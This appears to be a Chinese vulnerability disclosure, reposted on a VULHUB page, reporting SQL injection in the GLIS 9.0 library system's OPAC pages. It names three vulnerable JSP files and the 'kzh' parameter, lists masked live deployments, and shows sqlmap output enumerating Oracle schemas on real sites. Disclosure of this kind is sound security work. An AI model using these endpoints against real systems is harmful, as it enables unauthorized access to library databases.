|通用图书馆集成系统GLIS9.0高危注入 - VULHUB开源网络安全威胁库

通用图书馆集成系统GLIS9.0高危注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明： ``` 厂商：北京清大新洋科技有限公司官网：http://**.**.**.**/ 用户：http://**.**.**.**/yonghu.html ``` 这系统卖的挺贵的啊，看产品报价：http://**.**.**.**/cp/glis90.html ``` 产品名称：通用图书馆集成系统GLIS9.0 市场价格：198000元(FOR WIN)、228000元(FOR UNIX) 代理价格：138600元(FOR WIN)、159600元(FOR UNIX) 其它：以上报价为基本版，每增加一个用户加5000元。 ``` 每次提洞在wooyun先看前辈的洞，然后接着挖 http://**.**.**.**/bugs/wooyun-2010-099335 http://**.**.**.**/bugs/wooyun-2014-079840 http://**.**.**.**/bugs/wooyun-2010-085319 http://**.**.**.**/bugs/wooyun-2010-082667 看到用户还是有点哆嗦的。。。看截图 [<img src="https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png" alt="client.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png) 因为案例较多，随便一搜就很多：这里来一些（22个）： ``` http://**.**.**.**:8000/opac/ http://**.**.**.**/opac/ **.**.**.**:8090/opac/ **.**.**.**:8089/opac/ http://**.**.**.**:8090/opac/ **.**.**.**:8089/opac/ **.**.**.**:8089/opac/ **.**.**.**:8070/opac/ http://**.**.**.**:8000/opac/ **.**.**.**:8070/opac/ **.**.**.**/opac/ http://**.**.**.**:8070/ **.**.**.**:8086/opac/ **.**.**.**:8088/opac/ **.**.**.**:8089/opac/ **.**.**.**:8070/opac/ **.**.**.**:8080/opac/ **.**.**.**:8089/opac/ **.**.**.**:8070/opac/ **.**.**.**:8070/opac/ **.**.**.**:8070/opac/ **.**.**.**:8070/opac/ ``` 下面就闲话少说，看洞：注入一： ``` 文件：xskp.jsp POST参数kzh存在注入 ``` 注入二： ``` 文件：ckmarc.jsp POST参数kzh存在注入 ``` 注入三： ``` 文件：eaaldetail.jsp 参数：kzh存在注入 ``` 上述三个洞均已排除前人提交的漏洞，无重复。每个注入拿两个案例证明注入一、=========================================== 案例1、 ``` **.**.**.**:8088//opac/xskp.jsp POST： kzh=zyk0040640&dztm=&dctm= ``` [<img src="https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png" alt="0806_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png) [<img src="https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png" alt="0806_2_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png) 数据信息（17个库）： ``` web application technology: JSP back-end DBMS: Oracle [18:13:30] [INFO] fetching current user [18:13:30] [WARNING] reflective value(s) found and filtering ou current user: 'USRGLIS' [18:13:30] [INFO] fetching current database current schema (equivalent to database on Oracle): 'USRGLIS' [18:13:30] [WARNING] schema names are going to be used on Oracl as the counterpart to database names on other DBMSes [18:13:30] [INFO] fetching database (schema) names available databases [17]: [*] CTXSYS [*] DBSNMP [*] DMSYS [*] EXFSYS [*] MDSYS [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] SCOTT [*] SYS [*] SYSMAN [*] SYSTEM [*] TSG [*] TSMSYS [*] USRGLIS [*] WMSYS [*] XDB ``` 案例2、 ``` **.**.**.**:8080/opac/xskp.jsp POST：kzh=zyk0040640&dztm=&dctm= ``` [<img src="https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png" alt="0806_2_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png) 注入二、=========================================== 案例1、 ``` **.**.**.**:8088//opac/ckmarc.jsp POST: kzh=zyk0040640 ``` [<img src="https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png" alt="0806_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png) 案例2、 ``` **.**.**.**:8080/opac/ckmarc.jsp POST:kzh=zyk0040640 ``` [<img src="https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png" alt="0806_3_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png) 数据库信息： ``` web application technology: JSP back-end DBMS: Oracle [18:36:49] [INFO] fetching current user current user: 'USRGLIS' [18:36:49] [INFO] fetching current database current schema (equivalent to database on Oracle): 'USRGLIS' [18:36:49] [WARNING] schema names are going to be used on Oracle as the counterpart to database names on other DBMSes [18:36:49] [INFO] fetching database (schema) names [18:36:51] [INFO] the SQL query used returns 9 entries [18:36:51] [INFO] starting 5 threads [18:36:52] [INFO] retrieved: "EXFSYS" [18:36:52] [INFO] retrieved: "APEX_030200" [18:36:52] [INFO] retrieved: "MDSYS" [18:36:52] [INFO] retrieved: "CTXSYS" [18:36:52] [INFO] retrieved: "OLAPSYS" [18:36:55] [INFO] retrieved: "SYSTEM" [18:36:55] [INFO] retrieved: "XDB" [18:36:55] [INFO] retrieved: "USRGLIS" [18:36:55] [INFO] retrieved: "SYS" available databases [9]: [*] APEX_030200 [*] CTXSYS [*] EXFSYS [*] MDSYS [*] OLAPSYS [*] SYS [*] SYSTEM [*] USRGLIS [*] XDB ``` 注入三、=========================================== 案例1、 ``` **.**.**.**:8088//opac/eaal/eaaldetail.jsp?kzh=zyk0040640 ``` [<img src="https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png" alt="0806_7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png) 看看用户和库 [<img src="https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png" alt="0806_7_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png) 案例2、 ``` **.**.**.**/opac/eaal/eaaldetail.jsp?kzh=zyk0040640 ``` [<img src="https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png" alt="0806_7_6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png) 案例3、 ``` **.**.**.**:8080/opac/eaal/eaaldetail.jsp?kzh=zyk0040640 ``` [<img src="https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png" alt="0806_7_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png) 数据库： [<img src="https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png" alt="0806_7_4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png) ### 漏洞证明：已证明

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™